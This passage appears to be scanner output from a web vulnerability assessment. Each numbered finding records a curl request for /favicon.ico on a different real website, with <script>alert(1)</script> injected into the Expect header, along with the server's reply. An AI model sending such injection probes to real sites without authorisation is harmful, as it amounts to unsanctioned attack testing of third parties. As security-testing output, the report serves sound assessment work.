Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.52. http://www.bullguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bullguard.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullguard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=8
Date: Wed, 04 May 2011 01:31:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.53. http://www.buyshedvac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buyshedvac.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buyshedvac.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 03:06:54 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
X-Powered-By: PHP/5.3.3
Content-Length: 312

<html><head></head><body><iframe frameborder="0" scrolling="no" src="http://areasnap.com/?keywords=www.buyshedvac.com" width="100%" height="800"><p>Your browser does not support iframes, please click
...[SNIP]...

29.54. http://www.cabinsforyou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabinsforyou.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabinsforyou.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.55. http://www.cafepress.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cafepress.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CP: LVW20
Content-Length: 60
Date: Wed, 04 May 2011 03:01:19 GMT
Connection: close

The page cannot be displayed because the expectation failed.

29.56. http://www.carnivalwarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carnivalwarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carnivalwarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 913
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:18:05 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested URL was not found on this server.<P>
<HR>
<ADDRESS>
Web Server at carnivalwarehouse.com
</ADDRESS>
</BODY>
</
...[SNIP]...

29.57. http://www.cat-world.com.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cat-world.com.au
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cat-world.com.au
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:36:15 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.58. http://www.ccc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccc.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ccc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:07:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.59. http://www.cedarfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cedarfair.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cedarfair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:21:20 GMT
Content-Length: 37

Sorry, you have experienced an error.

29.60. http://www.celebsquares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebsquares.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebsquares.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:06:38 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-74.205.17.3=2030151872.0.0000; path=/

The page cannot be displayed because the expectation failed.

29.61. http://www.chaoticgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chaoticgame.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaoticgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:48:19 GMT
Content-Length: 60
Set-Cookie: BIGipServerwww2.chaoticgame.com_pool=2738080010.20480.0000; path=/

The page cannot be displayed because the expectation failed.

29.62. http://www.chaparral-racing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chaparral-racing.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaparral-racing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:56 GMT
Content-Length: 60
Set-Cookie: BNI__Chap_HTTP=1002120a00005000; Path=/; Max-age=3600

The page cannot be displayed because the expectation failed.

29.63. http://www.cheaptalkwireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptalkwireless.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheaptalkwireless.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.64. http://www.cheating-wives-datelink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheating-wives-datelink.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheating-wives-datelink.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:14:12 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.65. http://www.cherokee.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cherokee.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cherokee.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:54:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.66. http://www.chooseyou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chooseyou.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chooseyou.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.67. http://www.churchs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.churchs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.68. http://www.cityofmadison.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cityofmadison.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cityofmadison.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Connection: Keep-Alive
Content-Length: 60
Date: Wed, 04 May 2011 02:08:18 GMT
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

The page cannot be displayed because the expectation failed.

29.69. http://www.cjponyparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cjponyparts.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cjponyparts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:16:59 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.70. http://www.cnmnewsnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnmnewsnetwork.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnmnewsnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:53:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.71. http://www.codigobarras.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codigobarras.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.codigobarras.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: TRACKID=1f8a19505783dfe73d23ef420642e575; Path=/; Version=1
Set-Cookie: TRACKID=eb5f077510ac319d61c63b71b507cdc5; Path=/; Version=1
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Wed, 04 May 2011 02:10:24 GMT
Server: lighttpd/1.4.26-devel-109890:109892M
Content-Length: 346

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.72. http://www.colemanequip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colemanequip.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colemanequip.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.73. http://www.coloradocommunitynewspapers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradocommunitynewspapers.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coloradocommunitynewspapers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Wed, 04 May 2011 01:10:53 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: coloradocommunitynewspapers.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.74. http://www.commtrans.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commtrans.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.commtrans.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:02:52 GMT
Content-Length: 60
Set-Cookie: Coyote-2-c0a86363=c0a8630c:0; path=/

The page cannot be displayed because the expectation failed.

29.75. http://www.compperformancegroupstores.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compperformancegroupstores.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.compperformancegroupstores.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:34 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.76. http://www.concursolutions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.concursolutions.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.concursolutions.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Webserver: usseatuicte48
Date: Wed, 04 May 2011 02:57:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.77. http://www.connectingsingles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connectingsingles.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.connectingsingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="ALL DSP COR NID CURa ADMi OUR STP ONL UNI COM DEM"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:25:51 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.78. http://www.courts.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:00 GMT
Expires: Tue, 03 May 2011 20:49:00 GMT
Content-Length: 604
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50560<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...

29.79. http://www.cpllabs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cpllabs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cpllabs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:15:37 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.80. http://www.creationsrewards.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creationsrewards.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creationsrewards.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 22
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:45:40 GMT

<h1>404 File Not Found

29.81. http://www.crochetpatty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crochetpatty.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crochetpatty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:10:10 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.82. http://www.cruiseone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruiseone.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cruiseone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:53:40 GMT
Content-Length: 18
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSRCCSC=OAEBMKIBCDLCKEPAHOFMFECC; path=/
Cache-control: private

404 File Not Found

29.83. http://www.csi.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csi.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csi.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.84. http://www.curtmfg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curtmfg.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curtmfg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 02:30:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.85. http://www.cutlerycorner.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cutlerycorner.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cutlerycorner.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:43:48 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.86. http://www.dailysavingsdepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailysavingsdepot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailysavingsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:20:43 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Wed, 04 May 2011 01:20:43 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

29.87. http://www.depositaccounts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depositaccounts.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.depositaccounts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.88. http://www.dishant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dishant.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dishant.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:17:42 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.89. http://www.dreamcardailysweepstakes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamcardailysweepstakes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dreamcardailysweepstakes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:53:41 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

29.90. http://www.drkaslow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drkaslow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drkaslow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:56:53 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.91. http://www.easy-poll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easy-poll.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easy-poll.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:45:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.92. http://www.easyipodtransfer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
